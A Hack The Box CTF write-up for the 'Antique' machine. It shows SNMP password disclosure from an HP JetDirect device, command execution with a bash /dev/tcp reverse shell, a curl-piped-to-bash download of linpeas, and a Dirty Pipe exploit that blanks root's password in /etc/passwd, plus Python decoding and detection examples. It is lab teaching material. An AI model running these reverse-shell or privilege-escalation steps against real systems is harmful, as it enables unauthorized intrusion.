Antique Writeup
10 September 2022 #CTF #HTB #box #easy #linuxEnumeration
Let's start this box with an nmap scan:
$ sudo nmap -sC -sV -oN enum/initial.nmap 10.10.11.107
[...]
23/tcp open telnet?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
| JetDirect
| Password:
| NULL:
|_ JetDirect
[...]
HP JetDirect
The nmap scan shows only one TCP port open, and nmap isn't sure what's behind it. Fine, we'll check ourselves:
$ nc 10.10.11.107 23
HP JetDirect
Password: admin
Invalid password
HP JetDirect is HP's line of network print servers; what answers on port 23 is its telnet management console. Let's see if it has some known vulnerabilities:
$ searchsploit hp jetdirect
[...]
HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure
[...]
Sounds good.
SNMP
SNMP is the Simple Network Management Protocol. It lets you query information about all kinds of settings: CPU temperature, disk usage, and a lot more.
To make sure that SNMP is running we could perform a UDP nmap scan, but UDP scans are so slow that we'll just try blind (scanning only port 161 with -sU -p 161 would be enough if you want confirmation).
Turns out the HP JetDirect password can be queried with no authentication beyond the default 'public' community string:
$ snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
- -v 1: use version 1 of the protocol
- -c public: 'public' is the community string (the equivalent of a password) that allows the query (yes, it's that easy)
- .1.3.6.1.4.1.11.2.3.9.1.1.13.0: the OID (the identifier of the resource we want, the password), found here
The value is hexadecimal, so decode it:
$ echo -n '50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32' | xxd -r -p
P@ssw0rd@123!!12
I only took the first line of the output. It definitely looks like a password, but if we try it:
$ nc 10.10.11.107 23
HP JetDirect
Password: P@ssw0rd@123!!12
Invalid password
It works after appending a '3'. The reason is how snmpget renders a BITS value: first the raw octets in hex, then the index of every bit that is set (bit 0 being the top bit of the first octet). So the value is actually 17 bytes, 50 40 ... 31 32 33, and the '33' at the start of the second line is the last byte of the password; everything after it (1 3 9 17 18 ...) is that bit list (0x50 is 01010000, hence bits 1 and 3; 0x40 gives bit 9; and so on). Decoding all 17 bytes gives P@ssw0rd@123!!123 directly.
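The same split, done programmatically. This is an added example and not code from the writeup: the sample input is the snmpget output captured above, with its two physical lines joined by a space. Because a bit index such as 17 is also a valid hex byte, the helper does not guess where the octets stop; it tries each split point and keeps the one where the tail is exactly the bit list of the head.

```python
"""Decode the value snmpget prints for a BITS-typed OID.

net-snmp renders a BITS value as the raw octets in hex, followed by the
index of every set bit (bit 0 = the most significant bit of octet 0).
That trailing list is what made the JetDirect password look like it was
split over two lines of output.
"""
import re

# The output captured on the box, the two wrapped lines joined with a space.
SNMPGET_OUTPUT = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: "
    "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 "
    "33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 "
    "51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 "
    "115 119 122 123 126 130 131 134 135"
)


def set_bit_positions(data: bytes) -> list:
    """Return the indices of the set bits, counting from the MSB of byte 0."""
    positions = []
    for i, octet in enumerate(data):
        for bit in range(8):
            if octet & (0x80 >> bit):
                positions.append(i * 8 + bit)
    return positions


def decode_bits_output(line: str) -> bytes:
    """Split snmpget's 'BITS:' rendering into octets and bit list.

    Tokens like '17' are ambiguous (hex byte or bit index), so every split
    point is tried, longest octet run first, and the first one whose tail
    equals the computed bit list of the head wins.
    """
    m = re.search(r"=\s*BITS:\s*(.*)$", line, re.S)
    if not m:
        raise ValueError("not a BITS value")
    tokens = m.group(1).split()
    for n in range(len(tokens), 0, -1):
        head = tokens[:n]
        if not all(re.fullmatch(r"[0-9a-fA-F]{2}", t) for t in head):
            continue
        octets = bytes(int(t, 16) for t in head)
        try:
            tail = [int(t) for t in tokens[n:]]
        except ValueError:
            continue
        if set_bit_positions(octets) == tail:
            return octets
    raise ValueError("no consistent octet/bit-list split found")


if __name__ == "__main__":
    print(decode_bits_output(SNMPGET_OUTPUT).decode())
```

Run stand-alone it prints the full 17-character password; the same approach works for any BITS value, not just this OID.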
Foothold
Now that we have access to HP JetDirect, let's see what we can do:
$ nc 10.10.11.107 23
HP JetDirect
Password: P@ssw0rd@123!!123
Please type "?" for HELP
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
How nice, there is a convenient exec command!
> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
Let's just get our reverse shell:
> exec bash -c 'bash -i >& /dev/tcp/10.10.14.10/4242 0>&1'
Don't forget to start your listener on port 4242 before sending the command.
Privesc
After looking around without any success, I decided to run linpeas, a script that looks for privilege escalation vectors.
HTB boxes do not have internet access so first download the script to your own box then transfer it to the target box.
On your local box:
$ mkdir www
$ cd www
$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
On the target box:
lp@antique:~$ curl -s 10.10.14.10:8000/linpeas.sh | bash
[...]
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
Vulnerable to CVE-2022-0847
[...]
Damn, not one, not two, but three CVEs are exploitable on this box: CVE-2021-4034 (PwnKit) and CVE-2021-3560 (polkit) were already public when the box was released, while the third one, CVE-2022-0847 (Dirty Pipe), didn't exist yet. That's the one I'm going to try, you know, for fun (:
Dirty Pipe exploit
We'll use this repo. Just get the exp.c file and transfer it to the remote box.
Now compile:
lp@antique:~$ gcc exp.c -o pwn
This Linux kernel vulnerability lets an unprivileged user overwrite the cached contents of any file they can open for reading, regardless of write permissions. We can for example overwrite the /etc/passwd
file to remove the root user's password.
lp@antique:~$ head -n 1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
lp@antique:~$ ./pwn /etc/passwd 1 ootz:
This is the example provided in the repo. Let's think about what it does: it writes 'ootz:' into /etc/passwd at offset 1, i.e. one byte after the start of the file. Bytes are overwritten in place, never inserted, so 'root:x:' turns into 'rootz::': the ':' at the end of 'ootz:' lands on the 'x', which is the placeholder for the password. Offset 1 rather than 0 is not arbitrary, by the way: Dirty Pipe cannot start a write on a page boundary.
lp@antique:~$ head -n 1 /etc/passwd
rootz::0:0:root:/root:/bin/bash
Now the root account (renamed rootz) has an empty password field, so su lets us in without asking for a password:
lp@antique:~$ su rootz
rootz@antique:/home/lp# id
uid=0(rootz) gid=0(root) groups=0(root)
rootz@antique:/home/lp# ls /root
config.py root.txt snap snmp-server.py
And that's the box.
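To make the offset arithmetic and its aftermath concrete, here is an added Python example that is neither from the writeup nor from the exploit repo it links. It models the effect of `./pwn /etc/passwd 1 ootz:` on an in-memory copy of /etc/passwd, including the two placement limits a Dirty Pipe write has (it cannot start on a page boundary and cannot cross one), and then audits the result the way an incident responder checking a box for this kind of tampering would. The file content is constructed for the example; only its first line is taken from the output above.

```python
"""Model the /etc/passwd overwrite from the privesc and audit its traces."""
PAGE_SIZE = 4096

# Constructed sample; the first line is the one shown in the writeup.
PASSWD_BEFORE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n"
)


def dirty_pipe_overwrite(data: bytes, offset: int, payload: bytes) -> bytes:
    """Return a copy of `data` with `payload` written over the bytes at `offset`.

    Pure in-memory model of what the exploit does to the page cache: bytes
    are replaced, not inserted, and the file keeps its length. The checks
    mirror the limits of the Dirty Pipe primitive, which is why the repo's
    example uses offset 1 and not 0.
    """
    if not payload:
        raise ValueError("empty payload")
    if offset % PAGE_SIZE == 0:
        raise ValueError("cannot start writing at a page boundary")
    if (offset % PAGE_SIZE) + len(payload) > PAGE_SIZE:
        raise ValueError("cannot write across a page boundary")
    if offset + len(payload) > len(data):
        raise ValueError("write would extend past end of file")
    return data[:offset] + payload + data[offset + len(payload):]


def audit_passwd(text: str) -> list:
    """Flag the traces this kind of tampering leaves in /etc/passwd."""
    findings = []
    uid0_accounts = []
    names = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry with {len(fields)} fields")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        names.add(name)
        if pw == "":
            # Empty second field: no password needed at all (not even 'x').
            findings.append(f"line {lineno}: empty password field for {name}")
        if uid == "0":
            uid0_accounts.append(name)
            if name != "root":
                findings.append(f"line {lineno}: uid 0 account not named root: {name}")
    if "root" not in names:
        findings.append("no entry named root: first line probably overwritten")
    if len(uid0_accounts) > 1:
        findings.append("multiple uid 0 accounts: " + ", ".join(uid0_accounts))
    return findings


if __name__ == "__main__":
    after = dirty_pipe_overwrite(PASSWD_BEFORE.encode(), 1, b"ootz:").decode()
    print(after.splitlines()[0])
    for finding in audit_passwd(after):
        print("finding:", finding)
```

One caveat worth knowing on the response side: Dirty Pipe changes the page cache without marking the page dirty, so the modified /etc/passwd is what a live `cat` shows, while the copy on disk may still be intact and the change can vanish after a reboot or cache drop. Audit the live file, and compare it with the on-disk data if you can get at it another way.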
Key Takeaways
- SNMP can disclose juicy information
- Check CVEs for privesc after manual enumeration